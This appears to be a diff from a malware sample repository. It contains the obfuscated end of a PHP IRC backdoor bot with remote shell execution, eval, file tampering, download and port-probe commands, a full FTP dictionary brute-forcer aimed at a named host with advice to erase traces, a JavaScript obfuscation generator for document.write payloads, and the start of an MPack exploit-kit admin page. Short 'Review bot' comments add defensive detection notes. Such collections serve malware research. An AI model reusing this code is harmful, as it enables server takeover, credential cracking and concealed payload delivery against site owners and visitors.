if(($f7fabc1404929c == $td707b8140a662)) continue; if (isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")." ".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke']));
} else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] == ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else if (isset($h6e2baaf3b97db[1]) && isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]);
} else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) {
$n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2); $zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd);
$m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e = substr($v7c6483ddcd99e[0],1);
$d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") { q56eacb300613d($j351a1d2ad68bc,"NOTICE ".$v7c6483ddcd99e." :\1".ob5d21085bf2c0("VkVSU0lPTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ve'])."\1");
} for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<count($zdfff0a7fa1a55);$i865c0c0b4ab0e++) { if($zdfff0a7fa1a55[$i865c0c0b4ab0e] == "-s") {
$d73be252ca8221 = TRUE; } } if ($h6e2baaf3b97db[1] == "332") { $e01b6e20344b68 = $h6e2baaf3b97db[3];
} elseif ($h6e2baaf3b97db[2] == $m8052146769b14) { $e01b6e20344b68 = $v7c6483ddcd99e; } else { $e01b6e20344b68 = $h6e2baaf3b97db[2];
} if ($zdfff0a7fa1a55[0] == PHP_OS) { array_shift($zdfff0a7fa1a55); } if (substr($zdfff0a7fa1a55[0],0,1) == $aec12e0af93cb5['tr']) {
if (isset($see11cbb19052e[$m67b3dba8bc677]) || $h6e2baaf3b97db[1] == "332") { switch (substr($zdfff0a7fa1a55[0],1)) {
case l69923efad5b7a("sKM="): if ($h6e2baaf3b97db[1] != "332") { $see11cbb19052e[$m67b3dba8bc677] = FALSE;
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, htmen("b3V0")); } break; case l69923efad5b7a("qGWaoKKb"):
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6SSBRVUlU")); fclose($j351a1d2ad68bc); exit(0);
break; case l69923efad5b7a("tpWs"): if (count($zdfff0a7fa1a55)>1) { q56eacb300613d($j351a1d2ad68bc, substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("sKc="): if (isset($zdfff0a7fa1a55[1])) { $u954eef6d6eac5 = $zdfff0a7fa1a55[1];
} else { $u954eef6d6eac5 = getcwd(); } if (is_dir($u954eef6d6eac5)) { if (($o736007832d216 = opendir($u954eef6d6eac5))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$u954eef6d6eac5."\2");
while (($k435ed7e9f07f7 = readdir($o736007832d216)) !== FALSE) { if ($k435ed7e9f07f7 != "." && $k435ed7e9f07f7 != "..") {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> (".filetype($u954eef6d6eac5."/".$k435ed7e9f07f7).") $k435ed7e9f07f7");
sleep(1); } } closedir(); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$u954eef6d6eac5."\2");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8=") . " \2".$u954eef6d6eac5."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZGlyIQ=="));
} break; case l69923efad5b7a("p5Wp"): if (count($zdfff0a7fa1a55) > 1) { if (is_file($zdfff0a7fa1a55[1])) {
if (($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[1],"r"))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$zdfff0a7fa1a55[1]."\2");
while(!feof($k0666f0acdeed3)) { $m6438c669e0d0d = trim(fgets($k0666f0acdeed3,256)); df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> $m6438c669e0d0d");
sleep(1); } df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> [EOF]"); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$zdfff0a7fa1a55[1]."\2 for reading.");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8=") . " \2".$zdfff0a7fa1a55[1]."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZmlsZQ=="));
} } break; case l69923efad5b7a("tKuZ"): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break; case l69923efad5b7a("p5g="): if (count($zdfff0a7fa1a55) > 1) { if (chdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$zdfff0a7fa1a55[1]);
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
} } break; case l69923efad5b7a("tqE="): if (count($zdfff0a7fa1a55) > 1) { if (unlink($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("uKOqlZs="): if (count($zdfff0a7fa1a55) > 1) { if (touch($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("t62inpySoA=="): if (count($zdfff0a7fa1a55) > 2) { if (symlink($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p5ykqaE="): if (count($zdfff0a7fa1a55) > 2) { if (chown($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("p5yioZc="): if (count($zdfff0a7fa1a55) > 2) { if(chmod($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$zdfff0a7fa1a55[1]."\2 with permissions \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("sZ+Zm6U="): if (count($zdfff0a7fa1a55) > 1) { if (mkdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("tqGZm6U="): if (count($zdfff0a7fa1a55)>1) { if (rmdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p6Q="): if (count($zdfff0a7fa1a55) > 2) { if (copy($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("sZWeng=="): if (count($zdfff0a7fa1a55)>4) { $p099fb995346f3 = "From: <".$zdfff0a7fa1a55[2].">\r\n";
if (mail($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[3], substr($n78e731027d8fd,$zdfff0a7fa1a55[4]), $p099fb995346f3)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Send failure");
} } break; case l69923efad5b7a("sZ+ilmg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUQ1Ly8=") . " ".md5($zdfff0a7fa1a55[1]));
break; case l69923efad5b7a("qKKo"): if (isset($zdfff0a7fa1a55[1])) { $m957b527bcfbad = explode(".",$zdfff0a7fa1a55[1]);
if (count($m957b527bcfbad)==4 && is_numeric($m957b527bcfbad[0]) && is_numeric($m957b527bcfbad[1]) && is_numeric($m957b527bcfbad[2]) && is_numeric($m957b527bcfbad[3])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyaddr($zdfff0a7fa1a55[1]));
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyname($zdfff0a7fa1a55[1]));
} } break; case l69923efad5b7a("tpmoppSWqQ=="): q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6UVVJVC4uLg=="));
fclose($j351a1d2ad68bc); rfc35fdc70d5fc(); break; case l69923efad5b7a("tqI="): if(isset($zdfff0a7fa1a55[1])) {
$m8052146769b14 = ad988971435842((int)$zdfff0a7fa1a55[1]); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else { $m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} break; case l69923efad5b7a("tJyl"): if (count($zdfff0a7fa1a55) > 1) { eval(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("q5mp"): if (count($zdfff0a7fa1a55) > 2) { if (!($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[2],"w"))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
} else { if (!($eb5eda0a74558a = file($zdfff0a7fa1a55[1]))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
} else { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < count($eb5eda0a74558a); $i865c0c0b4ab0e++) { fwrite($k0666f0acdeed3,$eb5eda0a74558a[$i865c0c0b4ab0e]);
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8=") . " \2".$zdfff0a7fa1a55[1]."\2 downloaded to \2".$zdfff0a7fa1a55[2]."\2");
} fclose($k0666f0acdeed3); } } break; case l69923efad5b7a("sp0="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break; case l69923efad5b7a("t50="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break; case l69923efad5b7a("tKOnpqKUmuw="): if (isset($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { if (fsockopen($zdfff0a7fa1a55[1],(int)$zdfff0a7fa1a55[2],$t56bd7107802eb,$m341be97d9aff9,5)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Open\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Closed\2");
} } break; case l69923efad5b7a("uaKWn5g="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VW5hbWUvLw==")." " .php_uname());
break; case l69923efad5b7a("rZg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("SUQvLw==")." ".getmypid());
break; case l69923efad5b7a("p6GZ"): if (count($zdfff0a7fa1a55)>1) { $p1dccadfed7bcb = popen(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])),"r");
while (!feof($p1dccadfed7bcb)) { $k734515cbd3636 = trim(fgets($p1dccadfed7bcb,512)); if (strlen($k734515cbd3636)>0) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> ".$k734515cbd3636); sleep(1); }
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("PiBbRU9GXQ=="));
} break; case l69923efad5b7a("qayalaiYmg=="): h54d54a126a783(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
break; } } else { switch(substr($zdfff0a7fa1a55[0],1)) { case l69923efad5b7a("bg=="): if (isset($zdfff0a7fa1a55[1]) && md5($zdfff0a7fa1a55[1]) == jf9feaa9bcab30($aec12e0af93cb5['pa']) && preg_match(jf9feaa9bcab30($aec12e0af93cb5['ha']),$m67b3dba8bc677)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UmVhZHkvLyBPaw=="));
$see11cbb19052e[$m67b3dba8bc677] = TRUE; } else { df2f4e964f79d0($j351a1d2ad68bc, FALSE, jf9feaa9bcab30($aec12e0af93cb5['ch']), ob5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA=="));
} break; } } } } $td707b8140a662 = $f7fabc1404929c; } fclose($j351a1d2ad68bc); sleep(3); rfc35fdc70d5fc();
} else { shuffle($b59b514174bffe); rfc35fdc70d5fc(); } } function q56eacb300613d($s317d37b0edc7b, $n78e731027d8fd) {
fwrite($s317d37b0edc7b,"$n78e731027d8fd\r\n"); } function df2f4e964f79d0($s317d37b0edc7b, $d73be252ca8221, $e01b6e20344b68, $n78e731027d8fd) {
if($d73be252ca8221 != TRUE) { q56eacb300613d($s317d37b0edc7b, ob5d21085bf2c0("UFJJVk1TRw==")." $e01b6e20344b68 :$n78e731027d8fd");
} } function l69923efad5b7a($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function ad988971435842($wfac65290966c7) { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < $wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); if (posix_getegid() == 0) $t2cb9df9898e55 = "r-".$t2cb9df9898e55;
return $t2cb9df9898e55; } function h54d54a126a783($n111ca5df4a68b) { $y9b207167e5381 = ''; if (!empty($n111ca5df4a68b))
{ if(function_exists('exec')) { @exec($n111ca5df4a68b,$y9b207167e5381); $y9b207167e5381 = join("\n",$y9b207167e5381);
} elseif(function_exists('shell_exec')) { $y9b207167e5381 = @shell_exec($n111ca5df4a68b); } elseif(function_exists('system'))
{ @ob_start(); @system($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')) { @ob_start(); @passthru($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents();
@ob_end_clean(); } elseif(@is_resource($k8fa14cdd754f9 = @popen($n111ca5df4a68b,"r"))) { $y9b207167e5381 = "";
while(!@feof($k8fa14cdd754f9)) { $y9b207167e5381 .= @fread($k8fa14cdd754f9,1024); } @pclose($k8fa14cdd754f9);
} } return $y9b207167e5381; } function jf9feaa9bcab30($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function gfb0daa8f01135($wfac65290966c7) { $t2cb9df9898e55 = ""; for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<$wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $t2cb9df9898e55; } rfc35fdc70d5fc(); ?>

81
PHP/HackTool.PHP.Brute.a Normal file

@ -0,0 +1,81 @@
<?php
/*
* This simple FTp brute forcer script is coded by
* ^cybergang007^. I am in no way responsible for
* any serious job you do with this piece of code.
* Intended for educational purposes only.
*
* This bad script probes an FTP dictionary attack
*
* @Email : <soteres2002@greeknetizen.net>
* @URL : http://www.greeknetizen.net/
* @DESCTIPTION:
* This PHP script tries a password
* from the password file each time intil it finds it.
* Execute it from a webpage on your server, not from
* the command line(!). And remember to clear your
* traces if you succeed in cracking the password
* of the FTP account you desire. And once again,
* I am not responsible for any of your actions
* with this code.
*/
error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
set_time_limit(0); // set the time limit for the script to +oo
$passwordfile = "passwd.dic"; //this is the path to the passwordfile
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
$usrname = "bahoosh"; // change this to the username
// of the FTP account you want
// to attack
$interval = 1; // this is the break the script each time it tries a password
// do not set this to zero
//change the second arguments you desire
$crh = "Sorry, the host you specified cannot be retrieved!";
$cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with <b>$username</b> and password: $trypassword</font><br>";
/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */
if(!file_exists($passwordfile)) {
die("Sorry, the passwordfile <b>$passwordfile</b> cannot be retrieved");
} else {
// open connection funtion
function openconnection($targethost,$username,$trypassword) {
print "<hr>Trying password <b>$trypassword</b> for <b>".$username."</b> to $targethost<hr><br>";
$ftp_conn = @ftp_connect($targethost) or print $crh;
if($ftp_conn) {
$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
if(!$trylogin) {
print $cc;
} else {
print "<b><font color=\"red\">The password is: $trypassword</font></b><br>";
@ftp_quit($ftp_conn);
break;
}
}
}
//end of function
// try to open the password file
$fp = @fopen($passwordfile,"r");
if(!$fp) {
die("The password file cannot open");
} else {
print "<b>The passwordfile is forked!</b>";
//get the passwords
while($trypassword = @fgets($fp,1024)) {
openconnection($targethost,$usrname,$trypassword);
sleep($interval);
}
}
//...and close the password file or die of errors
@fclose($fp) or die("\n<br>\nCannot close the password file!\n");
echo "<b>The password file has closed";
}
// when you succeed connecting to your victim's server
// do not forget to delete your traces
?>
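Review bot: The section carries no analyst-facing note on how this script appears from the server side, which is what a reader of this corpus needs from it. The loop at the bottom makes one `ftp_login()` attempt per wordlist line against a single fixed username and calls `sleep($interval)` between attempts, so it shows up in an FTP server log as evenly spaced failed logins for one account from one source. I would add that as a header comment, for example `// ANALYSIS: sequential single-account FTP login failures at a fixed interval; caught by per-account lockout or failed-login rate alerts`. The author's own comments urge deleting traces afterwards, which is a reason to note that FTP authentication logs should be forwarded off-host.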

2026
PHP/HackTool.PHP.Haxplorer.c Normal file

File diff suppressed because it is too large Load Diff


@ -0,0 +1,52 @@
<?
function get_rnd_var() {return 'v'.uniqid('');}
function get_value($v, &$codebuf)
{
$var1 = get_rnd_var();
$var2 = get_rnd_var();
$vars = array(
"$v",
$var1,
$var1.'()',
$var1.'()',
);
$bufs = array(
"",
"var $var1=$v;",
"function $var1 () {return $v;}",
"function $var1 () {var $var2=$v; return $var2;}",
);
$item = rand(0, count($vars)-1);
$codebuf .= $bufs[$item];
return $vars[$item];
}
function encode_scuko ($q)
{
$r='';
for($i=0;$i<strlen($q);$i++)
{
$hex=dechex(ord($q[$i]));
if (strlen($hex)==1) $hex = '0'.$hex;
$r .= $hex;
}
$r=strtoupper($r);
$hex2dec=get_rnd_var();
$hex=get_rnd_var();
$codebuf1 = '';
$value16 = get_value(16, $codebuf1);
$c="function $hex2dec($hex){ $codebuf1 return(parseInt($hex,$value16));}";
$deco=get_rnd_var();
$t=get_rnd_var();
$s=get_rnd_var();
$i=get_rnd_var();
$codebuf2 = '';
$value2 = get_value(2, $codebuf2);
$c.="function $deco($t){ $codebuf2 var $s='';for($i=0; $i<$t.length; $i+=$value2){ $s+=(String.fromCharCode($hex2dec($t.substr($i, $value2))));}return $s;}";
$r="document.write($deco('$r'));";
return "<script>$c $r</script>";
}
?>
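Review bot: `encode_scuko()` has no comment describing what it emits, and the file name for this 52-line section is missing from the page, so a reader has nothing to identify it by. From the visible code it hex-encodes its input and returns a `<script>` block that defines two helper functions and passes the decoded string to `document.write()`; every identifier is `'v'.uniqid('')`, and `get_value()` randomly replaces the constants 16 and 2 with a variable or a function call. Names and constant wrappers therefore differ per response while the structure stays fixed: a `parseInt` with a radix that evaluates to 16, `String.fromCharCode` over two-character `substr` slices, and one long uppercase hex literal. A docstring saying so, e.g. `// Emits a JS hex decoder with per-request identifiers; match on structure, not names`, would save the next analyst the trace.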

229
PHP/HackTool.PHP.Mphak.b Normal file

@ -0,0 +1,229 @@
<?
//MPack admin module
//(c) 2006, 2007 DreamCoders Team
define("MAIN_MODULE", TRUE);
include('settings.php');
include('logincheck.php');
?>
<html>
<head>
<title>MPack</title>
<style>
<!--
.stext { font-family:Tahoma; font-size:8pt; color:white; text-align:right; }
.heading { font-family:Arial; font-weight:400; font-size:18pt; color:rgb(255,153,0); letter-spacing:90%; }
.tbldata { font-family:Tahoma; font-weight:bold; font-size:13; color:rgb(204,204,204); }
.tblhead { font-family:Verdana; font-weight:bold; font-size:9pt; color:white; }
.sstext { font-family:Tahoma; font-size:8pt; color:rgb(204,204,204); }
.css0 { font-family:Tahoma; font-size:8pt; color:rgb(255,153,0); }
-->
</style>
</head>
<body bgcolor="black" text="white" link="blue" vlink="purple" alink="red">
<p class="heading" align="right"> </p>
<table width="100%" cellpadding="0" cellspacing="0">
<tr>
<td width="70%" align="left" valign="top">
<p class="css0">Server time/date snapshot:&nbsp;<? echo(date("n-M-Y H:i:s")); ?><br>
<? $cci=GetCountryInfo(getenv("REMOTE_ADDR"));
echo(getenv("REMOTE_ADDR")." (".$cci['name'].")"); ?></p>
</td>
<td width="30%" align="right" valign="bottom">
<p class="heading">MPack v0.90 stats</p>
</td>
</tr>
</table>
<hr>
<table border="0" width="100%">
<tr>
<td width="50%">
